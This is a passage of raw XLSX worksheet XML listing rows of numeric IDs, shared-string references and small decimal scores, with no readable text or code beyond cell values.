      </c>
      <c r="B30362" s="2">
        <v>5.3717811E7</v>
      </c>
      <c r="C30362" s="2" t="s">
        <v>29191</v>
      </c>
      <c r="D30362" s="2">
        <v>1.0</v>
      </c>
      <c r="E30362" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30362" s="2">
        <v>0.1233521657250471</v>
      </c>
    </row>
    <row r="30363" ht="15.75" customHeight="1">
      <c r="A30363" s="1">
        <v>10156.0</v>
      </c>
      <c r="B30363" s="2">
        <v>5.7327653E7</v>
      </c>
      <c r="C30363" s="2" t="s">
        <v>29192</v>
      </c>
      <c r="D30363" s="2">
        <v>1.0</v>
      </c>
      <c r="E30363" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30363" s="2">
        <v>0.1233521657250471</v>
      </c>
    </row>
    <row r="30364" ht="15.75" customHeight="1">
      <c r="A30364" s="1">
        <v>12140.0</v>
      </c>
      <c r="B30364" s="2">
        <v>2.7087306E7</v>
      </c>
      <c r="C30364" s="2" t="s">
        <v>29193</v>
      </c>
      <c r="D30364" s="2">
        <v>1.0</v>
      </c>
      <c r="E30364" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30364" s="2">
        <v>0.1233521657250471</v>
      </c>
    </row>
    <row r="30365" ht="15.75" customHeight="1">
      <c r="A30365" s="1">
        <v>23473.0</v>
      </c>
      <c r="B30365" s="2">
        <v>5720970.0</v>
      </c>
      <c r="C30365" s="2" t="s">
        <v>29194</v>
      </c>
      <c r="D30365" s="2">
        <v>1.0</v>
      </c>
      <c r="E30365" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30365" s="2">
        <v>0.1233521657250471</v>
      </c>
    </row>
    <row r="30366" ht="15.75" customHeight="1">
      <c r="A30366" s="1">
        <v>25845.0</v>
      </c>
      <c r="B30366" s="2">
        <v>1.4814397E7</v>
      </c>
      <c r="C30366" s="2" t="s">
        <v>29195</v>
      </c>
      <c r="D30366" s="2">
        <v>1.0</v>
      </c>
      <c r="E30366" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30366" s="2">
        <v>0.1233521657250471</v>
      </c>
    </row>
    <row r="30367" ht="15.75" customHeight="1">
      <c r="A30367" s="1">
        <v>11576.0</v>
      </c>
      <c r="B30367" s="2">
        <v>2.2784318E7</v>
      </c>
      <c r="C30367" s="2" t="s">
        <v>29196</v>
      </c>
      <c r="D30367" s="2">
        <v>1.0</v>
      </c>
      <c r="E30367" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30367" s="2">
        <v>0.1231481481481482</v>
      </c>
    </row>
    <row r="30368" ht="15.75" customHeight="1">
      <c r="A30368" s="1">
        <v>24447.0</v>
      </c>
      <c r="B30368" s="2">
        <v>1.0916169E7</v>
      </c>
      <c r="C30368" s="2" t="s">
        <v>29197</v>
      </c>
      <c r="D30368" s="2">
        <v>1.0</v>
      </c>
      <c r="E30368" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30368" s="2">
        <v>0.1231481481481482</v>
      </c>
    </row>
    <row r="30369" ht="15.75" customHeight="1">
      <c r="A30369" s="1">
        <v>19889.0</v>
      </c>
      <c r="B30369" s="2">
        <v>5.7281098E7</v>
      </c>
      <c r="C30369" s="2" t="s">
        <v>29198</v>
      </c>
      <c r="D30369" s="2">
        <v>1.0</v>
      </c>
      <c r="E30369" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30369" s="2">
        <v>0.1231481481481481</v>
      </c>
    </row>
    <row r="30370" ht="15.75" customHeight="1">
      <c r="A30370" s="1">
        <v>28772.0</v>
      </c>
      <c r="B30370" s="2">
        <v>2.8418212E7</v>
      </c>
      <c r="C30370" s="2" t="s">
        <v>29199</v>
      </c>
      <c r="D30370" s="2">
        <v>1.0</v>
      </c>
      <c r="E30370" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30370" s="2">
        <v>0.1231481481481481</v>
      </c>
    </row>
    <row r="30371" ht="15.75" customHeight="1">
      <c r="A30371" s="1">
        <v>634.0</v>
      </c>
      <c r="B30371" s="2">
        <v>1.9693344E7</v>
      </c>
      <c r="C30371" s="2" t="s">
        <v>29200</v>
      </c>
      <c r="D30371" s="2">
        <v>1.0</v>
      </c>
      <c r="E30371" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30371" s="2">
        <v>0.1229508196721312</v>
      </c>
    </row>
    <row r="30372" ht="15.75" customHeight="1">
      <c r="A30372" s="1">
        <v>23359.0</v>
      </c>
      <c r="B30372" s="2">
        <v>5.5068627E7</v>
      </c>
      <c r="C30372" s="2" t="s">
        <v>29201</v>
      </c>
      <c r="D30372" s="2">
        <v>1.0</v>
      </c>
      <c r="E30372" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30372" s="2">
        <v>0.1229508196721311</v>
      </c>
    </row>
    <row r="30373" ht="15.75" customHeight="1">
      <c r="A30373" s="1">
        <v>32247.0</v>
      </c>
      <c r="B30373" s="2">
        <v>5.5068626E7</v>
      </c>
      <c r="C30373" s="2" t="s">
        <v>29201</v>
      </c>
      <c r="D30373" s="2">
        <v>1.0</v>
      </c>
      <c r="E30373" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30373" s="2">
        <v>0.1229508196721311</v>
      </c>
    </row>
    <row r="30374" ht="15.75" customHeight="1">
      <c r="A30374" s="1">
        <v>7317.0</v>
      </c>
      <c r="B30374" s="2">
        <v>5.0878333E7</v>
      </c>
      <c r="C30374" s="2" t="s">
        <v>29202</v>
      </c>
      <c r="D30374" s="2">
        <v>1.0</v>
      </c>
      <c r="E30374" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30374" s="2">
        <v>0.1228482003129891</v>
      </c>
    </row>
    <row r="30375" ht="15.75" customHeight="1">
      <c r="A30375" s="1">
        <v>19512.0</v>
      </c>
      <c r="B30375" s="2">
        <v>5.5934973E7</v>
      </c>
      <c r="C30375" s="2" t="s">
        <v>29203</v>
      </c>
      <c r="D30375" s="2">
        <v>1.0</v>
      </c>
      <c r="E30375" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30375" s="2">
        <v>0.1227598566308244</v>
      </c>
    </row>
    <row r="30376" ht="15.75" customHeight="1">
      <c r="A30376" s="1">
        <v>13294.0</v>
      </c>
      <c r="B30376" s="2">
        <v>3.4470626E7</v>
      </c>
      <c r="C30376" s="2" t="s">
        <v>29204</v>
      </c>
      <c r="D30376" s="2">
        <v>1.0</v>
      </c>
      <c r="E30376" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30376" s="2">
        <v>0.1226415094339623</v>
      </c>
    </row>
    <row r="30377" ht="15.75" customHeight="1">
      <c r="A30377" s="1">
        <v>19952.0</v>
      </c>
      <c r="B30377" s="2">
        <v>5.7517419E7</v>
      </c>
      <c r="C30377" s="2" t="s">
        <v>29205</v>
      </c>
      <c r="D30377" s="2">
        <v>1.0</v>
      </c>
      <c r="E30377" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30377" s="2">
        <v>0.1226415094339623</v>
      </c>
    </row>
    <row r="30378" ht="15.75" customHeight="1">
      <c r="A30378" s="1">
        <v>16357.0</v>
      </c>
      <c r="B30378" s="2">
        <v>4.6107379E7</v>
      </c>
      <c r="C30378" s="2" t="s">
        <v>29206</v>
      </c>
      <c r="D30378" s="2">
        <v>1.0</v>
      </c>
      <c r="E30378" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30378" s="2">
        <v>0.1225749559082893</v>
      </c>
    </row>
    <row r="30379" ht="15.75" customHeight="1">
      <c r="A30379" s="1">
        <v>11690.0</v>
      </c>
      <c r="B30379" s="2">
        <v>2.3455024E7</v>
      </c>
      <c r="C30379" s="2" t="s">
        <v>29207</v>
      </c>
      <c r="D30379" s="2">
        <v>1.0</v>
      </c>
      <c r="E30379" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30379" s="2">
        <v>0.1223958333333334</v>
      </c>
    </row>
    <row r="30380" ht="15.75" customHeight="1">
      <c r="A30380" s="1">
        <v>19767.0</v>
      </c>
      <c r="B30380" s="2">
        <v>5.6750634E7</v>
      </c>
      <c r="C30380" s="2" t="s">
        <v>29208</v>
      </c>
      <c r="D30380" s="2">
        <v>1.0</v>
      </c>
      <c r="E30380" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30380" s="2">
        <v>0.1223958333333334</v>
      </c>
    </row>
    <row r="30381" ht="15.75" customHeight="1">
      <c r="A30381" s="1">
        <v>33991.0</v>
      </c>
      <c r="B30381" s="2">
        <v>9411145.0</v>
      </c>
      <c r="C30381" s="2" t="s">
        <v>29209</v>
      </c>
      <c r="D30381" s="2">
        <v>1.0</v>
      </c>
      <c r="E30381" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30381" s="2">
        <v>0.1223958333333334</v>
      </c>
    </row>
    <row r="30382" ht="15.75" customHeight="1">
      <c r="A30382" s="1">
        <v>400.0</v>
      </c>
      <c r="B30382" s="2">
        <v>1.6670142E7</v>
      </c>
      <c r="C30382" s="2" t="s">
        <v>29210</v>
      </c>
      <c r="D30382" s="2">
        <v>1.0</v>
      </c>
      <c r="E30382" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30382" s="2">
        <v>0.1222222222222223</v>
      </c>
    </row>
    <row r="30383" ht="15.75" customHeight="1">
      <c r="A30383" s="1">
        <v>3201.0</v>
      </c>
      <c r="B30383" s="2">
        <v>3.7244579E7</v>
      </c>
      <c r="C30383" s="2" t="s">
        <v>29211</v>
      </c>
      <c r="D30383" s="2">
        <v>1.0</v>
      </c>
      <c r="E30383" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30383" s="2">
        <v>0.1222222222222222</v>
      </c>
    </row>
    <row r="30384" ht="15.75" customHeight="1">
      <c r="A30384" s="1">
        <v>5861.0</v>
      </c>
      <c r="B30384" s="2">
        <v>4.6955175E7</v>
      </c>
      <c r="C30384" s="2" t="s">
        <v>29212</v>
      </c>
      <c r="D30384" s="2">
        <v>1.0</v>
      </c>
      <c r="E30384" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30384" s="2">
        <v>0.1222222222222222</v>
      </c>
    </row>
    <row r="30385" ht="15.75" customHeight="1">
      <c r="A30385" s="1">
        <v>8471.0</v>
      </c>
      <c r="B30385" s="2">
        <v>5.4015257E7</v>
      </c>
      <c r="C30385" s="2" t="s">
        <v>29213</v>
      </c>
      <c r="D30385" s="2">
        <v>1.0</v>
      </c>
      <c r="E30385" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30385" s="2">
        <v>0.1222222222222222</v>
      </c>
    </row>
    <row r="30386" ht="15.75" customHeight="1">
      <c r="A30386" s="1">
        <v>13848.0</v>
      </c>
      <c r="B30386" s="2">
        <v>3.6874385E7</v>
      </c>
      <c r="C30386" s="2" t="s">
        <v>29214</v>
      </c>
      <c r="D30386" s="2">
        <v>1.0</v>
      </c>
      <c r="E30386" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30386" s="2">
        <v>0.1222222222222222</v>
      </c>
    </row>
    <row r="30387" ht="15.75" customHeight="1">
      <c r="A30387" s="1">
        <v>14643.0</v>
      </c>
      <c r="B30387" s="2">
        <v>4.0355216E7</v>
      </c>
      <c r="C30387" s="2" t="s">
        <v>29215</v>
      </c>
      <c r="D30387" s="2">
        <v>1.0</v>
      </c>
      <c r="E30387" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30387" s="2">
        <v>0.1220538720538721</v>
      </c>
    </row>
    <row r="30388" ht="15.75" customHeight="1">
      <c r="A30388" s="1">
        <v>26787.0</v>
      </c>
      <c r="B30388" s="2">
        <v>1.8562275E7</v>
      </c>
      <c r="C30388" s="2" t="s">
        <v>29216</v>
      </c>
      <c r="D30388" s="2">
        <v>1.0</v>
      </c>
      <c r="E30388" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30388" s="2">
        <v>0.1220538720538721</v>
      </c>
    </row>
    <row r="30389" ht="15.75" customHeight="1">
      <c r="A30389" s="1">
        <v>30208.0</v>
      </c>
      <c r="B30389" s="2">
        <v>3.737586E7</v>
      </c>
      <c r="C30389" s="2" t="s">
        <v>29217</v>
      </c>
      <c r="D30389" s="2">
        <v>1.0</v>
      </c>
      <c r="E30389" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30389" s="2">
        <v>0.1220538720538721</v>
      </c>
    </row>
    <row r="30390" ht="15.75" customHeight="1">
      <c r="A30390" s="1">
        <v>3934.0</v>
      </c>
      <c r="B30390" s="2">
        <v>4.0594666E7</v>
      </c>
      <c r="C30390" s="2" t="s">
        <v>29218</v>
      </c>
      <c r="D30390" s="2">
        <v>1.0</v>
      </c>
      <c r="E30390" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30390" s="2">
        <v>0.1220238095238095</v>
      </c>
    </row>
    <row r="30391" ht="15.75" customHeight="1">
      <c r="A30391" s="1">
        <v>6091.0</v>
      </c>
      <c r="B30391" s="2">
        <v>4.7698119E7</v>
      </c>
      <c r="C30391" s="2" t="s">
        <v>29219</v>
      </c>
      <c r="D30391" s="2">
        <v>1.0</v>
      </c>
      <c r="E30391" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30391" s="2">
        <v>0.1220238095238095</v>
      </c>
    </row>
    <row r="30392" ht="15.75" customHeight="1">
      <c r="A30392" s="1">
        <v>13465.0</v>
      </c>
      <c r="B30392" s="2">
        <v>3.5201419E7</v>
      </c>
      <c r="C30392" s="2" t="s">
        <v>29220</v>
      </c>
      <c r="D30392" s="2">
        <v>1.0</v>
      </c>
      <c r="E30392" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30392" s="2">
        <v>0.1220238095238095</v>
      </c>
    </row>
    <row r="30393" ht="15.75" customHeight="1">
      <c r="A30393" s="1">
        <v>216.0</v>
      </c>
      <c r="B30393" s="2">
        <v>1.4587826E7</v>
      </c>
      <c r="C30393" s="2" t="s">
        <v>29221</v>
      </c>
      <c r="D30393" s="2">
        <v>1.0</v>
      </c>
      <c r="E30393" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30393" s="2">
        <v>0.121832358674464</v>
      </c>
    </row>
    <row r="30394" ht="15.75" customHeight="1">
      <c r="A30394" s="1">
        <v>6030.0</v>
      </c>
      <c r="B30394" s="2">
        <v>4.7557945E7</v>
      </c>
      <c r="C30394" s="2" t="s">
        <v>29222</v>
      </c>
      <c r="D30394" s="2">
        <v>1.0</v>
      </c>
      <c r="E30394" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30394" s="2">
        <v>0.1218323586744639</v>
      </c>
    </row>
    <row r="30395" ht="15.75" customHeight="1">
      <c r="A30395" s="1">
        <v>32677.0</v>
      </c>
      <c r="B30395" s="2">
        <v>5942495.0</v>
      </c>
      <c r="C30395" s="2" t="s">
        <v>29223</v>
      </c>
      <c r="D30395" s="2">
        <v>1.0</v>
      </c>
      <c r="E30395" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30395" s="2">
        <v>0.1218323586744639</v>
      </c>
    </row>
    <row r="30396" ht="15.75" customHeight="1">
      <c r="A30396" s="1">
        <v>33274.0</v>
      </c>
      <c r="B30396" s="2">
        <v>7415862.0</v>
      </c>
      <c r="C30396" s="2" t="s">
        <v>29224</v>
      </c>
      <c r="D30396" s="2">
        <v>1.0</v>
      </c>
      <c r="E30396" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30396" s="2">
        <v>0.1217320261437909</v>
      </c>
    </row>
    <row r="30397" ht="15.75" customHeight="1">
      <c r="A30397" s="1">
        <v>2610.0</v>
      </c>
      <c r="B30397" s="2">
        <v>3.4424828E7</v>
      </c>
      <c r="C30397" s="2" t="s">
        <v>29225</v>
      </c>
      <c r="D30397" s="2">
        <v>1.0</v>
      </c>
      <c r="E30397" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30397" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="30398" ht="15.75" customHeight="1">
      <c r="A30398" s="1">
        <v>5179.0</v>
      </c>
      <c r="B30398" s="2">
        <v>4.47607E7</v>
      </c>
      <c r="C30398" s="2" t="s">
        <v>29226</v>
      </c>
      <c r="D30398" s="2">
        <v>1.0</v>
      </c>
      <c r="E30398" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30398" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="30399" ht="15.75" customHeight="1">
      <c r="A30399" s="1">
        <v>19557.0</v>
      </c>
      <c r="B30399" s="2">
        <v>5.605664E7</v>
      </c>
      <c r="C30399" s="2" t="s">
        <v>29227</v>
      </c>
      <c r="D30399" s="2">
        <v>1.0</v>
      </c>
      <c r="E30399" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30399" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="30400" ht="15.75" customHeight="1">
      <c r="A30400" s="1">
        <v>25590.0</v>
      </c>
      <c r="B30400" s="2">
        <v>1.4341177E7</v>
      </c>
      <c r="C30400" s="2" t="s">
        <v>29228</v>
      </c>
      <c r="D30400" s="2">
        <v>1.0</v>
      </c>
      <c r="E30400" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30400" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="30401" ht="15.75" customHeight="1">
      <c r="A30401" s="1">
        <v>9952.0</v>
      </c>
      <c r="B30401" s="2">
        <v>5.6894083E7</v>
      </c>
      <c r="C30401" s="2" t="s">
        <v>29229</v>
      </c>
      <c r="D30401" s="2">
        <v>1.0</v>
      </c>
      <c r="E30401" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30401" s="2">
        <v>0.121647509578544</v>
      </c>
    </row>
    <row r="30402" ht="15.75" customHeight="1">
      <c r="A30402" s="1">
        <v>10901.0</v>
      </c>
      <c r="B30402" s="2">
        <v>1.6632911E7</v>
      </c>
      <c r="C30402" s="2" t="s">
        <v>29230</v>
      </c>
      <c r="D30402" s="2">
        <v>1.0</v>
      </c>
      <c r="E30402" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30402" s="2">
        <v>0.121647509578544</v>
      </c>
    </row>
    <row r="30403" ht="15.75" customHeight="1">
      <c r="A30403" s="1">
        <v>28187.0</v>
      </c>
      <c r="B30403" s="2">
        <v>2.5006623E7</v>
      </c>
      <c r="C30403" s="2" t="s">
        <v>29231</v>
      </c>
      <c r="D30403" s="2">
        <v>1.0</v>
      </c>
      <c r="E30403" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30403" s="2">
        <v>0.121647509578544</v>
      </c>
    </row>
    <row r="30404" ht="15.75" customHeight="1">
      <c r="A30404" s="1">
        <v>31482.0</v>
      </c>
      <c r="B30404" s="2">
        <v>5048683.0</v>
      </c>
      <c r="C30404" s="2" t="s">
        <v>29232</v>
      </c>
      <c r="D30404" s="2">
        <v>1.0</v>
      </c>
      <c r="E30404" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30404" s="2">
        <v>0.121647509578544</v>
      </c>
    </row>
    <row r="30405" ht="15.75" customHeight="1">
      <c r="A30405" s="1">
        <v>33425.0</v>
      </c>
      <c r="B30405" s="2">
        <v>7775093.0</v>
      </c>
      <c r="C30405" s="2" t="s">
        <v>29233</v>
      </c>
      <c r="D30405" s="2">
        <v>1.0</v>
      </c>
      <c r="E30405" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30405" s="2">
        <v>0.121647509578544</v>
      </c>
    </row>
    <row r="30406" ht="15.75" customHeight="1">
      <c r="A30406" s="1">
        <v>40.0</v>
      </c>
      <c r="B30406" s="2">
        <v>1.0737368E7</v>
      </c>
      <c r="C30406" s="2" t="s">
        <v>29234</v>
      </c>
      <c r="D30406" s="2">
        <v>1.0</v>
      </c>
      <c r="E30406" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30406" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="30407" ht="15.75" customHeight="1">
      <c r="A30407" s="1">
        <v>758.0</v>
      </c>
      <c r="B30407" s="2">
        <v>2.0980808E7</v>
      </c>
      <c r="C30407" s="2" t="s">
        <v>29235</v>
      </c>
      <c r="D30407" s="2">
        <v>1.0</v>
      </c>
      <c r="E30407" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30407" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="30408" ht="15.75" customHeight="1">
      <c r="A30408" s="1">
        <v>1015.0</v>
      </c>
      <c r="B30408" s="2">
        <v>2.3108728E7</v>
      </c>
      <c r="C30408" s="2" t="s">
        <v>29236</v>
      </c>
      <c r="D30408" s="2">
        <v>1.0</v>
      </c>
      <c r="E30408" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30408" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="30409" ht="15.75" customHeight="1">
      <c r="A30409" s="1">
        <v>2986.0</v>
      </c>
      <c r="B30409" s="2">
        <v>3.6216127E7</v>
      </c>
      <c r="C30409" s="2" t="s">
        <v>29237</v>
      </c>
      <c r="D30409" s="2">
        <v>1.0</v>
      </c>
      <c r="E30409" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30409" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="30410" ht="15.75" customHeight="1">
      <c r="A30410" s="1">
        <v>3075.0</v>
      </c>
      <c r="B30410" s="2">
        <v>3.6538949E7</v>
      </c>
      <c r="C30410" s="2" t="s">
        <v>29238</v>
      </c>
      <c r="D30410" s="2">
        <v>1.0</v>
      </c>
      <c r="E30410" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30410" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="30411" ht="15.75" customHeight="1">
      <c r="A30411" s="1">
        <v>3299.0</v>
      </c>
      <c r="B30411" s="2">
        <v>3.7559668E7</v>
      </c>
      <c r="C30411" s="2" t="s">
        <v>29239</v>
      </c>
      <c r="D30411" s="2">
        <v>1.0</v>
      </c>
      <c r="E30411" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30411" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="30412" ht="15.75" customHeight="1">
      <c r="A30412" s="1">
        <v>5445.0</v>
      </c>
      <c r="B30412" s="2">
        <v>4.5631158E7</v>
      </c>
      <c r="C30412" s="2" t="s">
        <v>29240</v>
      </c>
      <c r="D30412" s="2">
        <v>1.0</v>
      </c>
      <c r="E30412" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30412" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="30413" ht="15.75" customHeight="1">
      <c r="A30413" s="1">
        <v>7261.0</v>
      </c>
      <c r="B30413" s="2">
        <v>5.0762407E7</v>
      </c>
      <c r="C30413" s="2" t="s">
        <v>29241</v>
      </c>
      <c r="D30413" s="2">
        <v>1.0</v>
      </c>
      <c r="E30413" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30413" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="30414" ht="15.75" customHeight="1">
      <c r="A30414" s="1">
        <v>11200.0</v>
      </c>
      <c r="B30414" s="2">
        <v>1.9939109E7</v>
      </c>
      <c r="C30414" s="2" t="s">
        <v>29242</v>
      </c>
      <c r="D30414" s="2">
        <v>1.0</v>
      </c>
      <c r="E30414" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30414" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="30415" ht="15.75" customHeight="1">
      <c r="A30415" s="1">
        <v>11357.0</v>
      </c>
      <c r="B30415" s="2">
        <v>2.1325422E7</v>
      </c>
      <c r="C30415" s="2" t="s">
        <v>29243</v>
      </c>
      <c r="D30415" s="2">
        <v>1.0</v>
      </c>
      <c r="E30415" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30415" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="30416" ht="15.75" customHeight="1">
      <c r="A30416" s="1">
        <v>11377.0</v>
      </c>
      <c r="B30416" s="2">
        <v>2.1416588E7</v>
      </c>
      <c r="C30416" s="2" t="s">
        <v>29244</v>
      </c>
      <c r="D30416" s="2">
        <v>1.0</v>
      </c>
      <c r="E30416" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30416" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="30417" ht="15.75" customHeight="1">
      <c r="A30417" s="1">
        <v>11439.0</v>
      </c>
      <c r="B30417" s="2">
        <v>2.1765338E7</v>
      </c>
      <c r="C30417" s="2" t="s">
        <v>29245</v>
      </c>
      <c r="D30417" s="2">
        <v>1.0</v>
      </c>
      <c r="E30417" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30417" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="30418" ht="15.75" customHeight="1">
      <c r="A30418" s="1">
        <v>11599.0</v>
      </c>
      <c r="B30418" s="2">
        <v>2.2947801E7</v>
      </c>
      <c r="C30418" s="2" t="s">
        <v>29246</v>
      </c>
      <c r="D30418" s="2">
        <v>1.0</v>
      </c>
      <c r="E30418" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30418" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="30419" ht="15.75" customHeight="1">
      <c r="A30419" s="1">
        <v>11839.0</v>
      </c>
      <c r="B30419" s="2">
        <v>2.4708978E7</v>
      </c>
      <c r="C30419" s="2" t="s">
        <v>29247</v>
      </c>
      <c r="D30419" s="2">
        <v>1.0</v>
      </c>
      <c r="E30419" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30419" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="30420" ht="15.75" customHeight="1">
      <c r="A30420" s="1">
        <v>12309.0</v>
      </c>
      <c r="B30420" s="2">
        <v>2.8377496E7</v>
      </c>
      <c r="C30420" s="2" t="s">
        <v>29248</v>
      </c>
      <c r="D30420" s="2">
        <v>1.0</v>
      </c>
      <c r="E30420" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30420" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="30421" ht="15.75" customHeight="1">
      <c r="A30421" s="1">
        <v>12518.0</v>
      </c>
      <c r="B30421" s="2">
        <v>2.9672398E7</v>
      </c>
      <c r="C30421" s="2" t="s">
        <v>29249</v>
      </c>
      <c r="D30421" s="2">
        <v>1.0</v>
      </c>
      <c r="E30421" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30421" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="30422" ht="15.75" customHeight="1">
      <c r="A30422" s="1">
        <v>12703.0</v>
      </c>
      <c r="B30422" s="2">
        <v>3.0811531E7</v>
      </c>
      <c r="C30422" s="2" t="s">
        <v>29250</v>
      </c>
      <c r="D30422" s="2">
        <v>1.0</v>
      </c>
      <c r="E30422" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30422" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="30423" ht="15.75" customHeight="1">
      <c r="A30423" s="1">
        <v>13738.0</v>
      </c>
      <c r="B30423" s="2">
        <v>3.6428651E7</v>
      </c>
      <c r="C30423" s="2" t="s">
        <v>29251</v>
      </c>
      <c r="D30423" s="2">
        <v>1.0</v>
      </c>
      <c r="E30423" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30423" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="30424" ht="15.75" customHeight="1">
      <c r="A30424" s="1">
        <v>14559.0</v>
      </c>
      <c r="B30424" s="2">
        <v>4.0030408E7</v>
      </c>
      <c r="C30424" s="2" t="s">
        <v>29252</v>
      </c>
      <c r="D30424" s="2">
        <v>1.0</v>
      </c>
      <c r="E30424" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30424" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="30425" ht="15.75" customHeight="1">
      <c r="A30425" s="1">
        <v>15630.0</v>
      </c>
      <c r="B30425" s="2">
        <v>4.3576332E7</v>
      </c>
      <c r="C30425" s="2" t="s">
        <v>29253</v>
      </c>
      <c r="D30425" s="2">
        <v>1.0</v>
      </c>
      <c r="E30425" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30425" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="30426" ht="15.75" customHeight="1">
      <c r="A30426" s="1">
        <v>16005.0</v>
      </c>
      <c r="B30426" s="2">
        <v>4.4971892E7</v>
      </c>
      <c r="C30426" s="2" t="s">
        <v>29254</v>
      </c>
      <c r="D30426" s="2">
        <v>1.0</v>
      </c>
      <c r="E30426" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30426" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="30427" ht="15.75" customHeight="1">
      <c r="A30427" s="1">
        <v>19021.0</v>
      </c>
      <c r="B30427" s="2">
        <v>5.4530687E7</v>
      </c>
      <c r="C30427" s="2" t="s">
        <v>29255</v>
      </c>
      <c r="D30427" s="2">
        <v>1.0</v>
      </c>
      <c r="E30427" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30427" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="30428" ht="15.75" customHeight="1">
      <c r="A30428" s="1">
        <v>19043.0</v>
      </c>
      <c r="B30428" s="2">
        <v>5.4568858E7</v>
      </c>
      <c r="C30428" s="2" t="s">
        <v>29256</v>
      </c>
      <c r="D30428" s="2">
        <v>1.0</v>
      </c>
      <c r="E30428" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30428" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="30429" ht="15.75" customHeight="1">
      <c r="A30429" s="1">
        <v>20620.0</v>
      </c>
